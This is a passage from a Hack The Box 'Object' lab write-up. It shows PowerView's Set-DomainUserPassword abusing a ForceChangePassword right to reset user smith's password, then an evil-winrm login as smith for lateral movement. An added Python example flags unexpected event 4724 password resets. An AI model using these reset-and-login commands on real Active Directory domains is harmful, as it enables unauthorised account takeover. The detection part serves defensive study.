ForceChangePassword
Following the Help section of BloodHound for the ForceChangePassword privilege.
Since the current PowerShell session is already authenticated with the credential of the oliver user, it is unnecessary to create a PSCredential object.
*evil-winrm* ps c:\tmp> $UserPassword = ConvertTo-SecureString 'Qwer1234' -AsPlainText -Force
However, I still do need to create a $UserPassword object.
*evil-winrm* ps c:\tmp> Set-DomainUserPassword -Identity smith -AccountPassword $UserPassword
Now changing the password of the smith user to Qwer1234.
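On the defender's side, a reset of one account's password by another account is recorded on the domain controller as Security event 4724 when account-management auditing is enabled. The following added example (not part of the original writeup) flags 4724 events whose subject is not on an allowlist of expected resetters; the allowlist, the helpdesk and jdoe accounts, the timestamps and the sample events are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Hypothetical allowlist: accounts expected to reset other users' passwords.
AUTHORIZED_RESETTERS = {"OBJECT\\helpdesk"}

def _event(event_id, subject, target, when):
    """Build a constructed Security event in exported-XML form (not a real log)."""
    data = {"TargetUserName": target, "TargetDomainName": "OBJECT",
            "SubjectUserName": subject, "SubjectDomainName": "OBJECT"}
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{when}"/></System>'
            f'<EventData>{fields}</EventData></Event>')

# Constructed sample input: an expected helpdesk reset, a reset by an ordinary
# user, and a self-service password change (4723).
SAMPLE_EVENTS = [
    _event(4724, "helpdesk", "jdoe", "2024-01-01T09:00:00Z"),
    _event(4724, "oliver", "smith", "2024-01-01T09:05:00Z"),
    _event(4723, "smith", "smith", "2024-01-01T09:10:00Z"),
]

def unexpected_resets(events_xml, authorized=AUTHORIZED_RESETTERS):
    """Return (time, subject, target) for 4724 resets by non-allowlisted accounts."""
    allowed = {a.lower() for a in authorized}
    hits = []
    for raw in events_xml:
        root = ET.fromstring(raw)
        if root.findtext("e:System/e:EventID", namespaces=NS) != "4724":
            continue  # 4723 is a user changing their own password, not a reset
        d = {n.get("Name"): (n.text or "")
             for n in root.iterfind("e:EventData/e:Data", NS)}
        subject = f'{d["SubjectDomainName"]}\\{d["SubjectUserName"]}'
        target = f'{d["TargetDomainName"]}\\{d["TargetUserName"]}'
        if subject.lower() in allowed:
            continue  # reset performed by an account expected to do so
        when = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
        hits.append((when, subject, target))
    return hits

if __name__ == "__main__":
    for when, subject, target in unexpected_resets(SAMPLE_EVENTS):
        print(f"{when} password reset of {target} by {subject}")
```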
WinRM
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i jenkins.object.local -u smith -p 'Qwer1234'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith
*Evil-WinRM* PS C:\Users\smith\Documents> hostname
jenkins
*Evil-WinRM* PS C:\Users\smith\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::20c
IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30
Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12
IPv4 Address. . . . . . . . . . . : 10.10.11.132
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2
Lateral Movement made to the smith user via DACL_Abuse